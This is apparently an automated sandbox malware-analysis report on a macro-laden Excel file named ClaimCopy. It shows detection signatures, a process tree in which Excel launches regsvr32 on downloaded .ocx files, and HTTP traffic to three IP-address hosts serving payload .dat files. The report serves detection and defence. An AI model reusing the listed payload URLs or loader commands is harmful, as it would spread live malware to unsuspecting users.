Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ClaimCopy-46148734-12012021.xlsb

Overview

General Information

Sample Name:ClaimCopy-46148734-12012021.xlsb
Analysis ID:532405
MD5:f1107ae8c76f3ac6c7691fa5a857b206
SHA1:b69597b25562a96547402d9bcadc096a340b8a69
SHA256:85278a1649ffd17dae84fce72827f804b0091b907efd841ac95f6b4644fd8d5a
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 4324 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3672 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 1132 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 1880 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5836 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5000 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 2060 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4324, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 3672

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: ClaimCopy-46148734-12012021.xlsbReversingLabs: Detection: 22%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.3:49713 -> 185.106.123.73:80
    Source: global trafficTCP traffic: 192.168.2.3:49716 -> 146.19.170.39:80
    Source: global trafficHTTP traffic detected: GET /710276824738.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /710276824738.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.19.170.39Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 146.19.170.39 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 94.140.114.63
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 185.106.123.73
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: unknownTCP traffic detected without corresponding DNS query: 146.19.170.39
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 07:32:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 07:33:26 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://146.19.170.39/710276824738.dat
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://146.19.170.39/710276824738.dat2
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://185.106.123.73/710276824738.dat
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://185.106.123.73/710276824738.dat&
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.565213476.0000000012CCA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599282665.0000000012CCA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://185.106.123.73/710276824738.dat2
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://185.106.123.73/710276824738.dat25
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://94.140.114.63/710276824738.dat
    Source: EXCEL.EXEString found in binary or memory: http://94.140.114.63/710276824738.dat2
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://94.140.114.63/710276824738.dat2e
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://94.140.114.63/710276824738.dat2s
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: http://94.140.114.63/710276824738.datd
    Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesqz
    Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
    Source: EXCEL.EXE, 00000001.00000002.751492725.000000000D63C000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tableU
    Source: EXCEL.EXE, 00000001.00000003.601454443.0000000015BA8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602979936.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617660841.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601358509.0000000015BEB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603033362.0000000015B37000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000001.00000003.603033362.0000000015B37000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000001.00000003.601454443.0000000015BA8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602979936.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617660841.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601358509.0000000015BEB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadx
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
